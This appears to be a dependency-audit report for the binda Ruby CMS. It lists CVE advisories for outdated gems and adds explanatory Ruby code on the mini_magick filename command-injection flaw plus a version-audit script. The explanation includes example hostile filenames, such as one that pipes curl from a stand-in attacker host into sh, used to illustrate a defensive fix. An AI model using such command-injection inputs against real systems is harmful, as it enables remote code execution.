BindaCMS/binda


Showing 81 of 81 total issues

Directory traversal in Rack::Directory app bundled with Rack
Open

    rack (2.0.7)
Severity: Critical
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2020-8161

Criticality: High

URL: https://groups.google.com/forum/#!topic/ruby-security-ann/T4ZIsfRf2eA

Solution: upgrade to ~> 2.1.3, >= 2.2.0

Update bundled libxml2 to v2.10.3 to resolve multiple CVEs
Open

    nokogiri (1.10.5)
Severity: Minor
Found in Gemfile.lock by bundler-audit

Update packaged libxml2 (2.9.12 → 2.9.13) and libxslt (1.1.34 → 1.1.35)
Open

    nokogiri (1.10.5)
Severity: Critical
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2021-30560

Criticality: High

URL: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-fq42-c5rg-92c2

Solution: upgrade to >= 1.13.2

Improper Handling of Unexpected Data Type in Nokogiri
Open

    nokogiri (1.10.5)
Severity: Critical
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2022-29181

Criticality: High

URL: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-xh29-r2w5-wx8m

Solution: upgrade to >= 1.13.6

Improper neutralization of data URIs may allow XSS in rails-html-sanitizer
Open

    rails-html-sanitizer (1.3.0)
Severity: Minor
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2022-23518

Criticality: Medium

URL: https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-mcvf-2q2m-x72m

Solution: upgrade to >= 1.4.4

Server-side request forgery in CarrierWave
Open

    carrierwave (1.2.3)
Severity: Minor
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2021-21288

Criticality: Medium

URL: https://github.com/carrierwaveuploader/carrierwave/security/advisories/GHSA-fwcm-636p-68r5

Solution: upgrade to ~> 1.3.2, >= 2.1.1

Regular Expression Denial of Service in Addressable templates
Open

    addressable (2.4.0)
Severity: Critical
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2021-32740

Criticality: High

URL: https://github.com/advisories/GHSA-jxhc-q857-3j6g

Solution: upgrade to >= 2.8.0

Uncontrolled Recursion in Loofah
Open

    loofah (2.3.1)
Severity: Critical
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2022-23516

Criticality: High

URL: https://github.com/flavorjones/loofah/security/advisories/GHSA-3x8r-x6xp-q4vm

Solution: upgrade to >= 2.19.1

Denial of Service in rubyzip ("zip bombs")
Open

    rubyzip (1.2.3)
Severity: Minor
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2019-16892

Criticality: Medium

URL: https://github.com/rubyzip/rubyzip/pull/403

Solution: upgrade to >= 1.3.0

Improper neutralization of data URIs may allow XSS in Loofah
Open

    loofah (2.3.1)
Severity: Minor
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2022-23515

Criticality: Medium

URL: https://github.com/flavorjones/loofah/security/advisories/GHSA-228g-948r-83gx

Solution: upgrade to >= 2.19.1

Remote command execution via filename
Open

    mini_magick (4.8.0)
Severity: Critical
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2019-13574

Criticality: High

URL: https://benjamin-bouchet.com/blog/vulnerabilite-dans-la-gem-mini_magick-version-4-9-4/

Solution: upgrade to >= 4.9.4
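The advisory above and its linked write-up attribute the mini_magick issue to filenames being handed to Ruby's Kernel#open, which treats a leading "|" as "spawn this command". The following Ruby snippet is an added example, not mini_magick's code and not part of this report: it shows that vulnerable shape next to a hardened reader built on File.open, which only ever opens files. The function names (`read_image_unsafe`, `read_image_safe`) and the sample inputs are chosen here for illustration.

```ruby
# Added example (not mini_magick's code): the Kernel#open pipe hazard behind
# "remote command execution via filename". Kernel#open (and IO.read) interpret
# a leading "|" as a command to spawn, so an attacker-controlled filename such
# as "|curl attacker/x|sh" becomes code execution. File.open has no such mode.
require "tempfile"

# Vulnerable shape: the caller-supplied name goes straight to Kernel#open.
# read_image_unsafe("|id") runs `id` and returns its stdout (recent Rubies print
# a deprecation warning for this; older ones do it silently).
def read_image_unsafe(path)
  open(path, "rb") { |io| io.read }
end

# Hardened shape: reject the pipe prefix explicitly so the failure is loud,
# then use File.open, which treats "|id" as an ordinary (missing) filename.
def read_image_safe(path)
  raise ArgumentError, "refusing to open #{path.inspect}" if path.start_with?("|")
  File.open(path, "rb") { |io| io.read }
end

# Demo on a constructed temporary file and a constructed hostile "filename".
if $PROGRAM_NAME == __FILE__
  Tempfile.create(["sample", ".png"]) do |f|
    f.write("\x89PNG\r\n\x1a\n")
    f.flush
    puts "read #{read_image_safe(f.path).bytesize} bytes from #{f.path}"
  end
  begin
    read_image_safe("|echo pwned")
  rescue ArgumentError => e
    puts "blocked: #{e.message}"
  end
end
```

The explicit prefix check is belt-and-braces: even without it, `File.open("|echo pwned")` raises Errno::ENOENT rather than spawning a shell. The same substitution (File.open or File.read in place of Kernel#open or IO.read) is the general fix wherever a filename can be influenced by a remote party, for example a URL or upload name passed to an image library.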

Out-of-bounds Write in zlib affects Nokogiri
Open

    nokogiri (1.10.5)
Severity: Critical
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2018-25032

Criticality: High

URL: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5

Solution: upgrade to >= 1.13.4

Denial of Service (DoS) in Nokogiri on JRuby
Open

    nokogiri (1.10.5)
Severity: Critical
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2022-24839

Criticality: High

URL: https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv

Solution: upgrade to >= 1.13.4

json Gem for Ruby Unsafe Object Creation Vulnerability (additional fix)
Open

    json (2.2.0)
Severity: Critical
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2020-10663

Criticality: High

URL: https://www.ruby-lang.org/en/news/2020/03/19/json-dos-cve-2020-10663/

Solution: upgrade to >= 2.3.0

Function LoginForm has 75 lines of code (exceeds 25 allowed). Consider refactoring.
Open

var LoginForm = function () {
    function LoginForm() {
        _classCallCheck(this, LoginForm);

        this.current = 0;
Severity: Major
Found in app/assets/javascripts/binda/dist/binda.bundle.js - About 3 hrs to fix

Function Shader has 71 lines of code (exceeds 25 allowed). Consider refactoring.
Open

var Shader = function () {
  function Shader() {
    _classCallCheck(this, Shader);

    this.uniforms = {
Severity: Major
Found in app/assets/javascripts/binda/dist/binda.bundle.js - About 2 hrs to fix

Cyclomatic complexity for cli_arg_version is too high. [9/6]
Open

def cli_arg_version
  return unless invoked_as_script? # don't want to hijack other binstubs
  return unless "update".start_with?(ARGV.first || " ") # must be running `bundle update`
  bundler_version = nil
  update_index = nil
Severity: Minor
Found in exe/bundle by rubocop

This cop checks that the cyclomatic complexity of methods is not higher than the configured maximum. The cyclomatic complexity is the number of linearly independent paths through a method. The algorithm counts decision points and adds one.

An if statement (or unless or ?:) increases the complexity by one. An else branch does not, since it doesn't add a decision point. The && operator (or keyword and) can be converted to a nested if statement, and ||/or is shorthand for a sequence of ifs, so they also add one. Loops can be said to have an exit condition, so they add one.

Possible shell escape sequence injection vulnerability in Rack
Open

    rack (2.0.7)
Severity: Minor
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2022-30123

Criticality: Critical

URL: https://groups.google.com/g/ruby-security-ann/c/LWB10kWzag8

Solution: upgrade to >= 2.0.9.1, ~> 2.0.9, >= 2.1.4.1, ~> 2.1.4, >= 2.2.3.1

Arbitrary path traversal and file access via yard server
Open

    yard (0.9.19)
Severity: Critical
Found in Gemfile.lock by bundler-audit

Advisory: CVE-2019-1020001

Criticality: High

URL: https://github.com/lsegal/yard/security/advisories/GHSA-xfhh-rx56-rxcr

Solution: upgrade to >= 0.9.20

Possible arbitrary path traversal and file access via yard server
Open

    yard (0.9.19)
Severity: Minor
Found in Gemfile.lock by bundler-audit

Advisory:

URL: https://github.com/lsegal/yard/security/advisories/GHSA-xfhh-rx56-rxcr

Solution: upgrade to >= 0.9.20
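Every Solution line above is bundler-audit's rendering of the patched-version constraints in ruby-advisory-db. The Ruby script below is an added example, not part of this report or of the binda project: it re-checks the pinned versions from a Gemfile.lock against those constraints using RubyGems' own Gem::Requirement, so the fix boundaries (for instance why rack 2.1.4 is still exposed to CVE-2022-30123 while 2.1.4.1 is not) can be reasoned about rather than eyeballed. The gem names, versions and advisory IDs are the ones shown on this page; the lock fragment is constructed; `locked_versions`, `vulnerable?` and `audit` are names chosen here. It assumes ruby-advisory-db semantics: constraints joined by commas inside one patched-version entry must all hold, a version is patched once it satisfies any entry, and unaffected-version lists (not shown on this page) are not modeled.

```ruby
# Added example (not part of the Code Climate report or of the binda project):
# re-check pinned Gemfile.lock versions against the "Solution" constraints that
# bundler-audit prints. Assumed semantics (ruby-advisory-db): each patched
# entry is a Gem::Requirement whose comma-joined constraints must ALL hold, and
# a version is patched as soon as it satisfies ANY entry. unaffected_versions
# are not modeled.
require "rubygems"

# Constructed Gemfile.lock fragment carrying the pinned versions from the report.
GEMFILE_LOCK = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      addressable (2.4.0)
        public_suffix (>= 2.0.2, < 4.0)
      carrierwave (1.2.3)
      json (2.2.0)
      loofah (2.3.1)
      mini_magick (4.8.0)
      nokogiri (1.10.5)
      rack (2.0.7)
      rails-html-sanitizer (1.3.0)
      rubyzip (1.2.3)
      yard (0.9.19)
LOCK

# Advisories from the report that carry an identifier and a Solution line. The
# rack CVE-2022-30123 Solution is a flattened rendering of three entries and is
# grouped back the way ruby-advisory-db lists them; the libxml2-2.10.3 entry
# has neither an ID nor a Solution on the page and is omitted.
ADVISORIES = [
  { gem: "rack", id: "CVE-2020-8161", patched: ["~> 2.1.3", ">= 2.2.0"] },
  { gem: "rack", id: "CVE-2022-30123",
    patched: ["~> 2.0.9, >= 2.0.9.1", "~> 2.1.4, >= 2.1.4.1", ">= 2.2.3.1"] },
  { gem: "nokogiri", id: "CVE-2021-30560", patched: [">= 1.13.2"] },
  { gem: "nokogiri", id: "CVE-2022-29181", patched: [">= 1.13.6"] },
  { gem: "nokogiri", id: "CVE-2018-25032", patched: [">= 1.13.4"] },
  { gem: "nokogiri", id: "CVE-2022-24839", patched: [">= 1.13.4"] },
  { gem: "rails-html-sanitizer", id: "CVE-2022-23518", patched: [">= 1.4.4"] },
  { gem: "carrierwave", id: "CVE-2021-21288", patched: ["~> 1.3.2", ">= 2.1.1"] },
  { gem: "addressable", id: "CVE-2021-32740", patched: [">= 2.8.0"] },
  { gem: "loofah", id: "CVE-2022-23516", patched: [">= 2.19.1"] },
  { gem: "loofah", id: "CVE-2022-23515", patched: [">= 2.19.1"] },
  { gem: "rubyzip", id: "CVE-2019-16892", patched: [">= 1.3.0"] },
  { gem: "mini_magick", id: "CVE-2019-13574", patched: [">= 4.9.4"] },
  { gem: "json", id: "CVE-2020-10663", patched: [">= 2.3.0"] },
  { gem: "yard", id: "CVE-2019-1020001", patched: [">= 0.9.20"] },
].freeze

# Map gem name => Gem::Version for the spec lines under "specs:". A spec line
# reads "name (x.y.z)" with a version starting in a digit; the dependency lines
# nested beneath it carry operators such as "(>= 2.0.2)" and are skipped.
def locked_versions(lock_text)
  versions = {}
  in_specs = false
  lock_text.each_line do |line|
    in_specs = true if line.match?(/\A\s*specs:\s*\z/)
    next unless in_specs
    m = line.match(/\A\s+(\S+) \((\d[^)]*)\)\s*\z/)
    versions[m[1]] = Gem::Version.new(m[2]) if m
  end
  versions
end

# True when the version satisfies none of the patched-version entries.
def vulnerable?(version, patched_entries)
  patched_entries.none? do |entry|
    Gem::Requirement.new(*entry.split(/,\s*/)).satisfied_by?(version)
  end
end

# "gem version: ID" for every advisory the lock is still exposed to.
def audit(lock_text, advisories = ADVISORIES)
  versions = locked_versions(lock_text)
  advisories.filter_map do |adv|
    version = versions[adv[:gem]]
    next unless version && vulnerable?(version, adv[:patched])
    "#{adv[:gem]} #{version}: #{adv[:id]}"
  end
end

puts audit(GEMFILE_LOCK) if $PROGRAM_NAME == __FILE__
```

Run against the fragment above, every one of the fifteen advisories is reported, matching the report. The grouping of the rack CVE-2022-30123 entries matters: splitting the flattened Solution line on commas and treating each piece as an alternative would declare rack 2.1.4 patched because it satisfies ">= 2.0.9.1", when the real constraint is "~> 2.1.4 and >= 2.1.4.1". When in doubt, read the patched_versions array in the ruby-advisory-db YAML for the advisory rather than the joined string.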
